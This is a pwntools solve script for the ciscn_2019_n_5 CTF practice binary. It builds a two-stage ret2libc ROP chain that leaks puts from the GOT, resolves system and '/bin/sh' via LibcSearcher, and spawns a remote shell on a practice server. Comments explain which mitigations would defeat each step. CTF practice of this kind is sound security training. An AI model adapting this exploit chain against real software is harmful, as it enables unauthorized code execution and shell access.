非常normal的ret2libc
"""Two-stage ret2libc solve script (pwntools) for the ciscn_2019_n_5 practice target.

Stage 1 overflows the stack buffer into a ROP chain that calls puts(puts@got)
to leak the runtime address of libc's puts, then returns to main for a second
round.  Stage 2 uses the leak (via LibcSearcher) to compute system() and
"/bin/sh" and overflows again to call system("/bin/sh").

Defender's notes on why each stage works (as far as this script shows):
- the overflow itself relies on the absence of a stack canary (otherwise the
  overwritten return address would be detected before main returns);
- the hard-coded gadget/PLT/GOT addresses rely on a non-PIE binary, so ASLR
  does not move the code region;
- the leak works because the GOT is readable and puts@plt can print it.
Stack canaries, PIE and a control-flow-integrity/shadow-stack mechanism would
each break one of these steps.
"""
from pwn import *
from LibcSearcher import *
# Remote CTF practice instance; the commented-out process() line is the
# local-testing alternative.
io = remote('node5.buuoj.cn',27414)
#io = process('./ciscn_2019_n_5')
elf = ELF('./ciscn_2019_n_5')
# Symbols resolved from the binary: main (to restart after the leak), the PLT
# stub for puts (callable) and its GOT slot (holds libc's puts address once
# the dynamic linker has resolved it).
main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# 'pop rdi; ret' gadget at a fixed address -- assumes a non-PIE binary
# (NOTE(review): confirm with checksec / disassembly).
pop_rdi_addr=0x0400713
# Stage-1 chain: 0x28 bytes of filler (presumably the distance from the buffer
# to the saved return address -- confirm in the disassembly), then
# rdi = puts@got; call puts@plt; return to main so a second payload can be sent.
payload1 = cyclic(0x28) + p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt)+p64(main)
# The program apparently prompts for one input before the 'me?' prompt;
# this first line just satisfies that prompt.
io.sendline(b'aa')
#io.sendline(payload1)
io.sendlineafter('me?',payload1)
#puts = u64(io.recvuntil(b'\xf7')[-8:])
#puts = u64((io.recvline().split(b'\x0a')[0]).ljust(8,b'\x00'))
# Read the leaked pointer: x86-64 userspace libc addresses are 6 significant
# bytes ending in 0x7f, so read up to that byte, keep the last 6 and
# zero-pad to 8 before unpacking.  (str patterns are encoded by pwntools.)
puts = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\0'))
print(hex(puts))
# Identify the libc build from the leaked puts address, then rebase
# system() and the "/bin/sh" string against it.
libc = LibcSearcher('puts',puts)
libc_base = puts - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
# Presumably a lone 'ret' gadget inserted to re-align the stack to 16 bytes
# before calling system() -- NOTE(review): confirm in the disassembly.
pop_ret_addr=0x04004c9
# Stage-2 chain: same filler, alignment ret, rdi = "/bin/sh", call system.
payload2 = cyclic(0x28) + p64(pop_ret_addr) +p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
# main was re-entered by stage 1, so the same two-prompt interaction repeats.
io.sendline(b'aa')
#io.sendline(payload2)
io.sendlineafter('me?',payload2)
io.interactive()